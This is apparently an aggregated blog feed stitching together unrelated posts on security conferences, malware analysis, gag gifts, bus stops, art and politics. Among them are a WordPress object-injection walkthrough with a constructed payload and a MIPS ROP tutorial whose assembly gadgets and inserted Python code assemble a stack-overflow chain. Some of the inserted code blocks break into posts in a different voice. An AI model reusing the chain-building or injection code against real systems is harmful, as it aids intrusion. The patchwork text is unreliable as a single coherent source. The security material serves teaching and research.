Pierre Omidyar is Glenn Greenwald's new financier. Hopefully he has changed his attitude since then.
Happy Day 2 of MIRcon®! Yesterday, Mandiant’s CEO Kevin Mandia kicked off MIRcon 2013 with a keynote on attacking the security gap, discussing the necessity of information-sharing and his experience witnessing the evolution of cybercrime. From there we moved on to thought-provoking discussions in both our management and technical tracks.
In case you missed it, here are some of the highlights:
(Photo: Kevin Mandia kicks off MIRcon 2013)
A session on the challenges in managing vulnerabilities, and what the security industry must do to manage the threat.
(Photo: Session at MIRcon 2013)
Stay tuned to this space as we’ll have more conference highlights tomorrow!
Recently, Mandiant's Technical Director, Michael Sikorski, was interviewed for [IN]SECURE magazine. In his interview Mike discusses the inspiration for his book, "Practical Malware Analysis," his process for analyzing malware, and offers advice for those interested in entering the field of malware analysis.
Following is an excerpt taken from the interview.
How do you approach the process of analyzing a new piece of malware? What tools do you use on a daily basis?
I start my analysis by running the malware through our internal sandbox and seeing what the sandbox outputs. At Mandiant, this happens automatically as we have internally developed two sandboxes over the last couple of years to which our incident responders directly submit malware found in the field.
After that, I spend time using basic static analysis techniques. This includes running tools like Strings, looking at the PE structure, and all the functionality the malware imports. This part of the analysis provides leads for the more in-depth analysis I perform.
After basic static analysis, I perform basic dynamic analysis. This includes running the malware in a safe environment, like a virtual machine. I use tools such as FakeNet, Procmon, and Process Explorer to see what impact the malware has on a system.
Next, I use the results from the basic analysis to help kick start and drive my analysis of the next phase – full disassembly. This is where the real software reverse engineering begins. I turn the binary data into assembly code I can read by a process called disassembling. The best and most popular tool for this is IDA Pro. IDA Pro allows me to browse around the code while annotating and keeping track of the in-depth analysis I perform at this level. If needed, I can use debuggers like WinDbg and OllyDbg to unpack malware or watch the malware as it runs at the code level live on a system.
In this phase you might have to fight against attackers trying to derail your analysis by using obfuscation, anti-debugging or anti-disassembly techniques. This often slows down the reverse engineering process. At the end of the day, the code must run and do bad stuff so we always figure it out sooner or later.
Be sure to download the latest issue of [IN]SECURE magazine at http://www.net-security.org/insecuremag.php to read the full interview.
I’ve been asked many times to support 32-bit keys with my XORSearch tool. But the problem is that a 32-bit bruteforce attack would take too much time.
Now I found a solution that doesn’t take months or years: a 32-bit dictionary attack.
I assume that the 32-bit XOR key is inside the file as a sequence of 4 consecutive bytes (in either most-significant-byte-first or least-significant-byte-first order).
If you use the new option -k, XORSearch will perform a 32-bit dictionary attack to find the XOR key. The standard bruteforce attacks are disabled when you choose option -k.
XORSearch will extract a list of keys from the file: all unique sequences of 4 consecutive bytes (read in both MSB-first and LSB-first order). Key 0x00000000 is excluded. Then it will use this list of keys to perform an XOR dictionary attack on the file, searching for the string you provided. Each key will be tested with an offset of 0, 1, 2 and 3.
It is not unusual to find the 32-bit XOR key inside the file itself. If it is a self-decoding executable, it can contain an x86 XOR instruction with the 32-bit key as immediate operand. Or if the original file contains a run of 0x00 bytes (at least 4 consecutive 0x00 bytes), then the encoded file will also contain the 32-bit XOR key, because XORing zeros with the key yields the key.
Here is a test where XORSearch.exe searches a 0xDEADBEEF XOR encoded copy of itself. With only 74KB, there are still 100000+ keys to test, taking almost 10 minutes on my machine:
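As an added example (my own code, not XORSearch's and not part of the original post), here is the 32-bit dictionary attack described above in Python: harvest every 4-byte window of the file in both byte orders as a candidate key, then try each candidate at all four alignments and look for the search string in the decoded output. The byte-order convention for applying the key (big-endian, offset 0 meaning byte 0 is XORed with 0xDE for 0xDEADBEEF) and the sample "executable" are assumptions of the example; the sample deliberately contains a run of NUL bytes so that the key appears in the encoded file, which is the self-revealing case the post relies on.

```python
import struct


def candidate_keys(data):
    """Key dictionary as the post describes it: every unique run of four
    consecutive bytes in the file, read in both byte orders, with 0 excluded."""
    keys = set()
    for i in range(len(data) - 3):
        keys.add(struct.unpack(">I", data[i:i + 4])[0])
        keys.add(struct.unpack("<I", data[i:i + 4])[0])
    keys.discard(0)
    return keys


def xor32(data, key, offset=0):
    """XOR data with the 4-byte key repeated, starting at key byte `offset` (0..3).
    Convention assumed here (not XORSearch's documented one): the key is laid out
    big-endian, so with offset 0 byte 0 is XORed with 0xDE for key 0xDEADBEEF.
    XOR is its own inverse, so the same call encodes and decodes."""
    kb = key.to_bytes(4, "big")
    return bytes(b ^ kb[(i + offset) & 3] for i, b in enumerate(data))


def dictionary_attack(data, needle):
    """Try every candidate key at all four alignments and return
    (key, offset, position) for every decoding that contains `needle`."""
    hits = []
    for key in sorted(candidate_keys(data)):
        for offset in range(4):
            pos = xor32(data, key, offset).find(needle)
            if pos != -1:
                hits.append((key, offset, pos))
    return hits


# Constructed stand-in for an executable: a PE-like header string, a run of
# sixteen NUL bytes and some filler; nothing here is a real binary.
PLAINTEXT = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode"
             + b"\x00" * 16 + b"PE\x00\x00" + bytes(range(64)))
ENCODED = xor32(PLAINTEXT, 0xDEADBEEF)

if __name__ == "__main__":
    print(f"{len(candidate_keys(ENCODED))} candidate keys")
    for key, offset, pos in dictionary_attack(ENCODED, b"DOS mode"):
        print(f"key 0x{key:08X} offset {offset} -> string at {pos}")
```

Several hits are reported for one file: each rotation of the key, read at the matching offset, produces the same keystream, so 0xDEADBEEF at offset 0 and 0xADBEEFDE at offset 3 decode identically. The pure-Python loop is only a demonstration; at the post's 74KB and 100000+ keys you want the C tool (or a vectorised XOR), since every candidate costs a full pass over the file.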
Don't pack your fabulous gifts in ordinary holiday boxes. This holiday season, hide those perfect purchases in the GameMaxx Prank Box from the NeatoShop. This fabulous box makes it look like you are giving someone a ridiculous product created by a clueless company. It is a great way to share the gift of laughter with everyone you love.
Be sure to check out the NeatoShop for more great Gag Gifts & Pranks.
Look at this shape. It seems to be some kind of box with a hinge facing us. But what it is doesn't really matter. It appears that the top and bottom are different colors BUT…
Place your finger horizontally over the "hinge" part. See? The top and the bottom are exactly the same color now. What sort of wizardry is this? -via Boing Boing
Just added some fun 3D binary visualization features to binwalk. Read more about it here.
The Hamburg Regional Court has ruled that the managing director of Appwork is personally liable for JDownloader2, even if an illegal feature is said to have come from the open-source community. In a beta, the software could download protected streaming videos....
According to the ruling, the managing director acts negligently if he does not put precautions in place, such as pre-release checks, that prevent the software from being offered with functionality that infringes rights. That of course sends a clear signal about Germany as a technology location ...
I'm just back from Amsterdam, where the 5th edition of the OWASP Benelux Day was organised. This was already my third visit to this event and I have finished my Benelux tour: Luxembourg in 2011, Belgium in 2012 and the Netherlands this year. The location was very nice; the Amsterdam RAI is a very nice venue for events but also expensive: the event was reduced to a single day (no training) and there was no WiFi for the attendees. But who cares? After all, we attend conferences to listen to speakers and not to surf the web...
As usual, Seba opened the event with the classic OWASP updates. He gave some feedback about AppSec USA (which took place last week). If you're interested, a YouTube channel is available with all the talks (43!). A new guide is available: "Application Security Guide for CISOs". It explains the reasons for investing in application security, how to manage application security, and metrics. The AppSec Newsfeed is back and the podcast (managed by Jim Manico) is still alive. As you can see, there are plenty of interesting sources of information.
The keynote was presented by Jan Joris Vereijken, Chief Security Architect at ING. The topic was computer fraud. For Jan Joris, fighting fraud is very difficult and it can't be stopped. His approach is to make fraud unprofitable. To achieve this, we have to get into the fraudster's mind. Think about authentication: for years, banks improved the way users authenticate, using tokens, etc. But this does not protect them against fraud; it is a fail! A nice example was demonstrated with real screenshots from an infected customer. The malware injects HTML code into the page and displays a new, bogus incoming payment. Then the fraudster calls the victim and asks him to refund the money ("Sorry, it was a mistake"). Result: the customer sends HIS money to the fraudster! Pwn3d!
Jan Joris's job is to implement detection mechanisms to prevent this. This can be done at multiple levels: customer devices, fraudster watch, network layer, application layer or transaction domain. To achieve this, correlation might help. Think about a login to the e-banking website from Nigeria. This looks clearly suspicious. But if the customer used a local ATM in Nigeria and then connects to the website, this is normal behaviour! For Jan Joris, better authentication would be: let the customer in and have them tell me what they want to do! Not sure that regulators will like this...
Then he explained a difficult step in the fraud process: recruiting mules. Infecting computers is much easier than finding good mules. Why is the fraud ratio so low? Because fraudsters lack mules to transfer the money. Fraud in banks follows a cycle: when a bank implements a new security control, fraudsters move to the next bank until it also increases its security, etc. And mules cannot be used across multiple banks (nor across countries). Note that ransomware is a nice way to get money without the help of a mule: the money is sent directly to the fraudster.
And what about big corporations? Why are they less targeted? In fact they use the same technology as individuals to transfer money; the difference is the amount of money authorised per transfer. For a customer like us, it's 50K/day. For a big company like Shell, it's 10M/day! The problem is to find mules (again). Who will accept a transfer of x million dollars? Note that Bitcoin is on the list of potential threats for banks (it can also replace the mule). Finally, Jan Joris explained why ING pushes more and more customers to use mobile applications for their banking operations. In fact, it is much safer! Why? Developing malware for an app requires a lot of investment (time/money) and will work only for one app. Once the problem is fixed by the bank, the investment is lost. This keynote was very good, with relevant information from the banking landscape.
The first regular speaker was Tom Van Goethem with a presentation about the well-known CMS WordPress: "Remote code execution in WordPress". With 60M websites, WordPress is definitely a nice target for researchers. Some stats: in 2004, 435 CVEs were published, and only 16 in 2013. Tom's research has been released under CVE-2013-4338. It's important to remember that most vulnerabilities are introduced by plugins. There are thousands of plugins available for WordPress, so always be careful when choosing yours!
The vulnerability is the combination of a PHP object injection via unserialize() and MySQL's handling of UTF-8; Tom explained why in detail. First, PHP recommends never passing user input to the function unserialize(). But because of MySQL's incomplete UTF-8 support, it is possible to reach this function with attacker-controlled data. MySQL's "utf8" character set stores at most three bytes per character. What happens to a character that needs a fourth byte? To handle it properly, tables must be created with the utf8mb4 character set. This is not documented by MySQL! The WordPress vulnerability relies on the fact that user meta data (first name, last name, contact info), stored in wp_usermeta (default character set: utf8), can be serialised: it is serialised when written to the database and, when retrieved from the database, passed to unserialize(). Tom explained step by step how he wrote a payload to trigger this issue and execute remote code. More information is available on Tom's blog.
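The mechanism above, as an added example written for this page (not Tom's exploit and not WordPress code): a Python model of the write path (values that already look serialised are serialised once more so they round-trip as strings; everything else is stored verbatim), of MySQL's behaviour when a 3-byte "utf8" column receives a character that needs four bytes (a non-strict server keeps what precedes it and silently drops the rest), and of the read path, which hands anything serialised-looking to unserialize(). The simplified is_serialized() check, the stdClass placeholder and the trailing text in the payload are assumptions of the example; which class makes the injected object exploitable is Tom's part and is not reproduced.

```python
import re


def php_serialize_str(s):
    """PHP serialize() of a string; the length is a byte count, not a character count."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def is_serialized_like(s):
    """Simplified stand-in for WordPress's is_serialized() (assumption of this
    example): a type tag and colon at the start, and the terminator a
    serialize() record ends with. The real function checks more than this."""
    return bool(s) and bool(re.match(r'^[aOs]:\d+:', s)) and s[-1] in ';}'


def mysql_store(text, charset):
    """Model of an INSERT into a column with the given CHARACTER SET. MySQL's
    3-byte 'utf8' cannot hold a 4-byte character: a non-strict server keeps
    what precedes it and drops the rest (warning 1366). utf8mb4 keeps it all."""
    if charset == "utf8mb4":
        return text
    if charset != "utf8":
        raise ValueError(charset)
    for i, ch in enumerate(text):
        if len(ch.encode("utf-8")) == 4:
            return text[:i]
    return text


def write_user_meta(value, charset):
    """Write path: a value that already looks serialised is serialised once
    more so it round-trips as a plain string; anything else is stored as-is."""
    to_store = php_serialize_str(value) if is_serialized_like(value) else value
    return mysql_store(to_store, charset)


def read_user_meta(stored):
    """Read path: the type tag unserialize() would be handed ('s' for a harmless
    string record, 'O' for an object), or None if the value stays a plain string."""
    return stored[0] if is_serialized_like(stored) else None


# Constructed payload: a serialised object, a 4-byte character (U+1F600), then
# trailing text so the value does NOT look serialised when it is submitted.
PAYLOAD = 'O:8:"stdClass":0:{}' + "\U0001F600" + "nothing to see"

if __name__ == "__main__":
    for charset in ("utf8", "utf8mb4"):
        stored = write_user_meta(PAYLOAD, charset)
        print(f"{charset:8s} stored={stored!r} -> unserialize tag: {read_user_meta(stored)}")
```

With the column in utf8 the trailing text is cut off in the database, so what comes back is exactly the serialised object and the read path unserialises it; with utf8mb4 the value survives intact, still does not look serialised, and nothing happens. The two independent fixes follow directly: create the tables with utf8mb4 (and run MySQL in strict mode so truncation is an error rather than a warning), and never let data that a user can influence reach unserialize() at all.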
The next talk was also about a famous CMS: SharePoint, developed by Microsoft. Jan Phillip and Alexios Fakos (both from n.runs) reviewed interesting information about SharePoint security. Many companies use it but deploy it in the wrong way, read: in an unsafe way! SharePoint does everything (as the vendor says). Its goal is to share data quickly. So, when you are in front of a SharePoint instance during a network assessment or pentest, how do you deal with it? That was the goal of the talk. First, the security model used by SharePoint was reviewed. It is based on objects (the central administration site, the web/service applications, site collections, sites and site components). Separation of duties is available. Normally SharePoint is used as an internal application, but more and more instances are facing the Internet. Most instances are deployed with the standard wizard and this introduces security issues:
An interesting extension is Datapump, which allows passing users' Kerberos credentials directly to the back-end database. This can result in a DoS of Datapump and of the back-end SQL database. End users can pass different credentials. An interesting talk if you need to assess SharePoint servers.
After a short lunch break, the second keynote speaker was the retired General Dick Berlijn, now working for Deloitte: “Cyber Security: What’s next?”. This was not a technical keynote but more about the context of cyber security. Two essential elements for a working society: security & trust. For him, the definition of “cyber” includes:
What about the future? Imagine yourself at home at 9AM preparing a meeting. Your mobile knows that your meeting is at 10AM and calls your driverless car. The car selects the best route based on traffic jams. During the drive, you continue to work via WiFi. This is the concept of Smart-"everything". But we must take security into account to make these things available when we need them.
A comparison was made between climate change and cyber security: if one country does its best to reduce climate change but other countries don't, it will still suffer from the climate. Where are the responsibilities? There are different types of actors: Global, Regional, National, Organisational, Individuals. Another comparison, with highways: they are safe because everybody at all levels follows the rules and uses them safely. We have to think about the same responsibilities for cyber security. This cannot be solved with technical solutions.
The bottom line:
Migchiel de Jong, from HP Fortify, presented a talk about code review. Doing this manually is useless, simply because our brain is not designed for that purpose. Some facts today:
To do good code analysis, we need to know the requirements of the application. The specifications must be known. Spec + code + automatic tool = proof? Failed! Because any one of the three components may have errors or bugs. Then Migchiel explained how to improve the process of code review and what its future will be. I was less attracted by this talk.
After a coffee break, Jerome Nokin presented his research about AVs: "Turning Your Managed AV... into my Botnet". Why AV at an OWASP event? Because managed AV solutions use central servers to communicate with clients, and they use our classic protocols. The talk was not a technical description of how they found the vulnerabilities (Jerome will release a paper soon) but of how to use them. The targets were McAfee ePO and Symantec Endpoint Protection. Today, Jerome focused on McAfee for time reasons. He explained how a classic infrastructure is built and what protocols are used between the different elements (agents & servers). Communications are based on HTTP requests and multiple vulnerabilities were found:
What about the registration request? To register your own agent! Jerome demonstrated that the way 3DES is implemented is... a big fail. The key is obfuscated in the binary and is the same for all versions, all sites! Based on those findings, how to perform remote code execution? Let's play:
So, the scenario is:
How to own the workstations? Let's create a rogue package by updating catalog.z on the ePO server. Those are also encrypted with 3DES and we know the key. Have a look at the video demo! Jerome also did an Internet survey. What are the results? Some people expose their server on the Internet! They can be detected by the SSL certificate. Results: 1701 servers found and 50% were vulnerable (11 in Amsterdam, by the way).
Conclusions: security issues exist in security products, even mature ones! They are hidden by complex protocols or structures. Do not under-estimate a single vulnerability. Do not rely on the CVE score only! More information on Jerome's blog.
The idea of the project was to trace apps in an emulated environment to monitor their behaviour. Tracedroid is a modified Android OS for method tracing: a framework for dynamic analysis, to detect suspicious activity and make post-analysis easy. The scope was limited to the tracing of Java code because the interesting features are only accessible via Java! Applications are written in Java, have building blocks like receivers (e.g. to be notified of the reception of an SMS) and are distributed as .apk files. There are other projects like DroidBox, which injects trace methods into the bytecode; the problem is that it breaks the app signature (easily detected by malware). Another version injects tracing code into the core libraries, but only a small subset of the API is supported and only Android 2.1. The Android profiler is a method tracer for developers. DroidScope uses VMI to reconstruct instructions and is bound to an emulator (not free).
Tracedroid (it extends Android's profiler implementation):
What is important during an analyze is the stimulation phase (to be sure to trigger some app functions). This is achieved with:
The project includes also a post processing phase:
How does the inspection tool quickly analyse >100K lines of trace output? Using Python scripts (interactive shell + graphics module). A nice demo was performed; I especially liked the de-obfuscation of a URL... Note that you can also submit your own .apk files via an online service and get a tar.gz file with the results: tracedroid.few.vu.nl
And we already reached the end of the day! I’d like to thank WhiteHat Security for the Kindle Fire! Please don’t abuse my business card! See you next year in Luxembourg!
"QUANTUM SHOT" #858
Article by Avi Abrams
"Bus stop, bus goes, she stays, love grows... under my umbrella"
You may remember the magical bus stop from the cult animation "My Neighbour Totoro" by Japanese director Hayao Miyazaki, complete with a lovable monster and heart-warming sharing of umbrellas (watch it here). Or you might enjoy listening to a great "sunshine pop" classic "Bus Stop" by The Hollies. In any case, you will be quite unprepared to see the wildly bizarre (or simply ridiculous) bus stop designs and "abandonments" that we feature in this article. You might even start your own photographic collection of similarly misshaped and misused public transportation enclaves.
As for some of the better-looking and creative bus stop designs... here are a few examples we like:
(top: disco bus stop creative, original unknown; bottom left - ecological bus stop island, by Anton Kochurkin, via; bottom right - Maite Otano)
Here is a cool bus stop, seen in Estonia:
(image credit: Vladimir Kezling)
"Shark Attack" city bench seen in Thailand:
Bus station in Hoofddorp, Holland
Designed by NIO architecten, this endearing orange blob looks like it has just been squeezed out of a kid's toothpaste tube. It also comes in a plain unadorned concrete colour, which looks even stranger than the orange treatment:
(images credit: Radek Brunecky via)
A similarly curved (and beautiful) bus stop is located in Casar de Caceres in western Spain:
Winning design by Hannah Tribe and Marcus Trimble - from the North Sydney Bus Shelter and Canopy Entrance Competition of 2006 - looks quite different by day and by night:
This turned inside-out, deconstructed and cheerfully painted Magic Bus Stop can be seen in Ventura, California (designed by Dennis Oppenheim):
(images credit: Dennis Oppenheim, via)
Here is a reversed bus stop (left image below), with a wonderful sea view, by the artist Lisa Kereszi. On the right is the school bus "designer bus stop" seen in Athens, Georgia:
(images via 1, 2)
Comfortable? You Bet!
Bus stops on the Shetland Islands are all decorated differently, but all are extremely comfortable (perhaps because the wait times are longer?):
(images via 1, 2, 3)
Shown above are similarly cozy bus stops in Cornwall (left) and Manchester, England.
And here you can really appreciate the level of comfort offered by a bus stop on Unst Island, Shetland, (this bus stop even used to have its own website):
Cute Japanese Bus Stops
Some lovely fruit shapes:
The stops were built for the Travel Expo show in 1990 with the intent to serve as an attractive gateway for travelers entering the Nagasaki Prefecture. According to the Isahaya City web site, the creators got the idea for these unusual shapes from the famous story of Cinderella where the carriage turns into a pumpkin.
(images credit: 1, 2)
Not all of them are fruit-shaped, there are also some really fishy designs:
Psychedelic Soviet Bus Stops
This awesome tiled sea-creature bus stop is located in Abkhazia, close to Pitzunda (designed by the famous, or rather infamous, Georgian-Russian sculptor Zurab Tsereteli):
(images credit: Maxim Karakulov, Privet Sochi, Julia)
This kind of bus stop design creativity has been happening in these parts since the 1950s:
These bus stops are not completely in the middle of nowhere, they are placed along the bus routes in Soviet Central Asia: in former Soviet republics of Kyrgyzstan, Uzbekistan, Tajikistan, Turkmenistan and Kazakhstan - see more in this set
(images credit: Christopher Herwig)
Dilapidated and very basic bus stop shelters can be seen in Armenia:
Battling the winter in Yaroslavl, Russia:
(image credit: Vitaly Sokolov)
Plenty of marketing stunts use bus stop locations.
Here are some examples of guerrilla marketing, done right:
IKEA and Home Depot would certainly benefit from displaying their attractive furniture and building materials to a bus crowd "captive audience":
This one is probably the winner (at least it's the most irresistible): ALL-YOU-CAN-POP BUBBLE WRAP ! - more info
Bus stop designs done right: bottom row - Seattle (left) and Praha, Czech Republic (right):
(bottom right image via)
Just horsing around, waiting for the right bus to come along... -
(image credit: Wanderoos)
And this bus stop seems to have already swallowed some customers (not that they seem to mind):
Article by Avi Abrams, Dark Roasted Blend.
In 2008, Walter White was building his meth empire in the AMC hit series Breaking Bad. That same year, Tuscaloosa County, Alabama's most successful meth cook was also making the purest meth east of the Mississippi. His name? Walter White, and by then he had been at it for ten years. He's so good that some say he should be called the "meth chef."
In this newly released documentary, Giana Toboni and VICE traveled to Alabama to interview the real life Walter White. The meth cook exposed the secret of his legendary operation - he explained how he got started, how he made - and spent - thousands of dollars every day, how he got arrested and why his partners are now serving life sentences behind bars.
The video clip:
View the original clip over at VICE - Thanks Laura Rothkopf!
Unveiled Obscurity, 2013. Mixed media assemblage. 32″ x 46″ x 12″.
Unveiled Obscurity, detail.
Neo-Hellenism, 2013. Mixed media assemblage. 37″ x 35″ x 11″.
Intelligent Redesign, 2013. Mixed media assemblage. 40″ x 50″ x 12″.
Intelligent Redesign, detail.
Expulsion, 2013. Mixed media assemblage. 24″ x 32″ x 9″.
Der Ubermensch of the Post-Post World Calamity Variety, 2013. Mixed media assemblage. 54″ x 48″ x 16″.
This week Kansas-based artist Kris Kuksi (previously) opened his fourth solo show, Revival, at Joshua Liner Gallery. Kuksi continues his use of ornate assemblage to create wildly complex sculptures that comment on history, life, death, and spiritual conflict. In the words of director Guillermo del Toro:
"A postindustrial Rococo master, Kris Kuksi obsessively arranges characters and architecture with an exquisite sense of drama. Instead of stones and shells he uses screaming plastic soldiers, miniature engine blocks, towering spires and assorted debris to form his landscapes. The political, spiritual, and material conflict within these shrines is enacted under the calm gaze of remote deities and august statuary. Kuksi manages to evoke, at once, a sanctum and a mausoleum for our suffocated spirit."
Revival will be on view through January 18, 2014 and you can see many more pieces from the exhibition in this gallery.
(Image: Radoslaw Botev, modified)
Sweden and Switzerland are two countries somewhere in Europe--or so I've heard. They are, it turns out, not the same place, nor interchangeable.
Chinese tourists, however, are not always aware of this:
The problem largely stems from the fact that both nations' names are written similarly in Mandarin - Ruidian (Sweden) and Ruishi (Switzerland) – which begin with the same symbol, according to the Swedish Consul General Victoria Li in China.
The Swedish and Swiss consulates in Shanghai want to find a solution to this problem. So they've jointly launched a contest, inviting people to think of funny ways to tell the countries apart. The winner gets a 12-day trip to both countries. Afterward, the winner must report back on his or her findings.
How would you tell them apart?
-via Dave Barry
The Chaos Computer Club is explicitly, and first of all, portrayed/branded as the creator or source of the crisis. Because it is not the inherent insecurity, the incompetent implementation, or the "concept" that barely deserves the name and anticipates its own failure that are to blame for the total failure, no, the critics are to blame!
Well, and when you now hear that there is a massive campaign, who do you think of first? Hm? Of course!
Unbelievable, but true: the Axel Springer publishing house is entering into an exclusive (contractual?) arrangement with the federal government and is being paid by the Federal Ministry of the Interior to promote the electronic ID card in Bild, Welt & Co. as the "Volksausweis" ("people's ID"). On a recurring basis and, naturally, mentioning only the advantages. Well, if the far-right national-conservative "Union" is at the helm, then with the matching vocabulary!
Which PR shop did that tumble out of this time...
According to Matzzie, Hayden was on a call with reporters and was speaking under the condition of anonymity, intending to be cited only as "a former senior administration official." You would think that he, of all people, ought to know better.
And last but not least he also asked the NSA guy whether he could take a photo with him. Magnificent.
I’ve previously written some examples of how to exploit MIPS stack overflows using ROP techniques. The problem is that finding suitable MIPS ROP gadgets manually can be quite tedious, so I have added a new IDA plugin – mipsrop.py – to my github repository.
This plugin searches the code segment(s) of your IDB looking for potentially controllable jump instructions. You can then search the code surrounding these controllable jumps for useful instructions that you might need in your ROP chain.
“Controllable jumps” are defined as jumps whose destination addresses are loaded from the stack, or from other registers (typically during a stack overflow you control several, if not all, of the MIPS subroutine registers, for example).
The plugin's searches are "dumb" in that they don't follow code branches, but nonetheless it has proven to be quite effective. As a quick example, let's look inside a Linux MIPS libc library for ROP gadgets that will let us call sleep(1) in order to force a cache flush.
First, we need to set up the argument to sleep; in MIPS, this means that we need to load the value 1 into register $a0. A typical ROP gadget for accomplishing this might look like:
    li $a0, 1       // Set $a0 = 1
    move $t9, $s0   // Set $t9 = $s0; we control $s0 via a stack overflow, and can load it with the address of our next ROP gadget
    jalr $t9        // Jump to the address in $t9
    nop
This allows us to get the value 1 into the $a0 register and then jump to the next ROP gadget. After activating the mipsrop.py plugin (Alt+1 hotkey), we can easily search our controllable jumps for the "li $a0, 1" instruction using the mipsrop.find method:
We can see that the first gadget, at offset 0x28BE4, works quite nicely:
With the argument to sleep now set up, our second ROP gadget needs to actually call sleep; but, it also needs to force sleep to return to a location of our choosing (e.g., sleep needs to return to a third ROP gadget). Indirect function returns are ideally suited for this type of operation and generally look something like this:
    move $t9, $s2       // Set $t9 = $s2; we control $s2 via a stack overflow, and can load it with the address of sleep()
    lw $ra, 0x20($sp)   // Load the return address off the stack into $ra; since we control data on the stack, we can get the address of the next ROP gadget loaded into $ra
    jr $t9              // Jump to $t9
    addiu $sp, 0x24
Because we control both $s2 and the data on the stack, we can control where this code jumps to and what the return address is. If we load the address of sleep into $s2 during our initial stack overflow, and place the address of our third ROP gadget at $sp+0x20, this gadget will jump to the sleep function, which, upon completion, will return to our third ROP gadget (whatever that may be).
To find an indirect return gadget in our library, we’ll want to search for controllable jumps that move a subroutine register into $t9, then perform a jr instruction:
The gadget at offset 0x2FFD4 loads the return address off the stack and jumps to whatever address is stored in $s2:
Combining this with the first gadget at offset 0x28BE4 gives us a two gadget ROP chain which will call sleep(1), then continue execution from whatever arbitrary address that we place on the stack at $sp+0x24:
    loc_28BE4:
        li $a0, 1           // Set $a0 = 1; this is where we return to after our stack overflow
        move $t9, $s0       // Set $t9 = $s0; we control $s0 via the initial stack overflow, and can load it with the address of our next ROP gadget at 0x2FFD4
        jalr $t9            // Jump to the address in $t9 ($t9 == $s0 == 0x2FFD4)
        li $a2, 1
    ...
    loc_2FFD4:
        move $t9, $s2       // Set $t9 = $s2; we control $s2 via the initial stack overflow, and can load it with the address of sleep()
        lw $ra, 0x24($sp)   // Load sleep's return address off the stack into $ra; we control the stack, and can put an arbitrary address here
        lw $s2, 0x20($sp)
        lw $s1, 0x1C($sp)
        lw $s0, 0x18($sp)
        jr $t9              // Jump to $t9 ($t9 == $s2 == sleep)
        addiu $sp, 0x28
And that’s pretty much how ROP works in MIPS: find some controllable jalr’s / jr’s that you can chain together to perform a required sequence of instructions while maintaining control of execution.
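As an added example (my own code, not the mipsrop.py plugin's and not from the original post), the Python below reproduces the plugin's notion of a "controllable jump" outside IDA, on a constructed disassembly listing that embeds the two gadgets above between filler the search must reject, and then lays out the stack words for the sleep(1) chain. The listing, the sleep() offset, the big-endian target and the saved-register layout of the overflowed frame are assumptions of the example, not facts from the post.

```python
import re
import struct

# Constructed disassembly ("addr: instruction" per line), not real libc output:
# it embeds the post's two gadgets (0x28BE4, 0x2FFD4) next to a jalr whose $t9
# comes from the GOT via $gp, which the search must reject.
LISTING = """
00028BD0: lw $t9, -0x7F20($gp)
00028BD4: move $a0, $s1
00028BD8: addiu $a1, $sp, 0x10
00028BDC: jalr $t9
00028BE0: nop
00028BE4: li $a0, 1
00028BE8: move $t9, $s0
00028BEC: jalr $t9
00028BF0: li $a2, 1
0002FFD0: sw $v0, 0x14($sp)
0002FFD4: move $t9, $s2
0002FFD8: lw $ra, 0x24($sp)
0002FFDC: lw $s2, 0x20($sp)
0002FFE0: lw $s1, 0x1C($sp)
0002FFE4: lw $s0, 0x18($sp)
0002FFE8: jr $t9
0002FFEC: addiu $sp, 0x28
"""

JUMP_RE = re.compile(r"^(jalr|jr)\s+\$t9$")
MOVE_T9_RE = re.compile(r"^move\s+\$t9,\s*\$(s[0-7])$")
LW_T9_SP_RE = re.compile(r"^lw\s+\$t9,\s*(0x[0-9A-Fa-f]+)\(\$sp\)$")
LW_RA_SP_RE = re.compile(r"^lw\s+\$ra,\s*(0x[0-9A-Fa-f]+)\(\$sp\)$")


def parse_listing(text):
    """'addr: instruction' lines -> list of (int address, instruction text)."""
    out = []
    for line in text.splitlines():
        m = re.match(r"^\s*([0-9A-Fa-f]+):\s+(\S.*?)\s*$", line)
        if m:
            out.append((int(m.group(1), 16), m.group(2)))
    return out


def find_gadgets(text, lookback=8):
    """Controllable jumps in the post's sense: a jalr/jr $t9 whose $t9 was loaded
    from a saved register ($s0-$s7) or from the stack by the instructions since
    the previous jump. Like the plugin, this does not follow branches."""
    insns = parse_listing(text)
    gadgets, last_jump = [], -2
    for i, (addr, insn) in enumerate(insns):
        jm = JUMP_RE.match(insn)
        if not jm:
            continue
        start = max(i - lookback, last_jump + 2)  # past the previous jump's delay slot
        last_jump = i
        ctrl = ra_off = None
        for _, prior in insns[start:i]:
            if m := MOVE_T9_RE.match(prior):
                ctrl = m.group(1)
            elif m := LW_T9_SP_RE.match(prior):
                ctrl = "sp+" + m.group(1)
            elif m := LW_RA_SP_RE.match(prior):
                ra_off = int(m.group(1), 16)
        if ctrl is None:
            continue  # e.g. $t9 loaded through $gp (an ordinary GOT call): not steerable
        gadgets.append({"jump": addr, "kind": jm.group(1), "ctrl": ctrl,
                        "ra_off": ra_off, "insns": insns[start:i + 2]})  # incl. delay slot
    return gadgets


def find(gadgets, pattern):
    """Like mipsrop.find(): gadgets containing an instruction matching the regex."""
    return [g for g in gadgets if any(re.search(pattern, t) for _, t in g["insns"])]


def indirect_returns(gadgets):
    """Gadgets that jump through $t9 and also reload $ra from the stack."""
    return [g for g in gadgets if g["kind"] == "jr" and g["ra_off"] is not None]


def build_chain(libc_base, sleep_off, gadget3, endian=">"):
    """Stack words for the post's two-gadget sleep(1) chain. Assumed, not from the
    post: a big-endian target, sleep() at libc_base + sleep_off, and an overflowed
    frame whose saved $s0,$s1,$s2,$ra sit directly before the frame gadget 2 pops."""
    g1 = libc_base + 0x28BE4   # li $a0,1 ; move $t9,$s0 ; jalr $t9
    g2 = libc_base + 0x2FFD4   # move $t9,$s2 ; lw $ra,0x24($sp) ; ... ; jr $t9 ; addiu $sp,0x28
    sleep = libc_base + sleep_off
    # Restored by the vulnerable function's epilogue: $s0 -> g2, $s2 -> sleep, $ra -> g1.
    frame0 = struct.pack(endian + "IIII", g2, 0, sleep, g1)
    # Consumed by gadget 2 (0x28 bytes): sleep()'s return address is read from 0x24($sp).
    frame1 = bytearray(0x28)
    struct.pack_into(endian + "I", frame1, 0x24, gadget3)
    return frame0 + bytes(frame1)


if __name__ == "__main__":
    gadgets = find_gadgets(LISTING)
    for g in find(gadgets, r"li \$a0, 1") + indirect_returns(gadgets):
        print(f"jump at 0x{g['jump']:X} via ${g['ctrl']}, $ra from stack: {g['ra_off']}")
    print(build_chain(0x2AAB0000, 0x5F000, 0x2AAF0000).hex())
```

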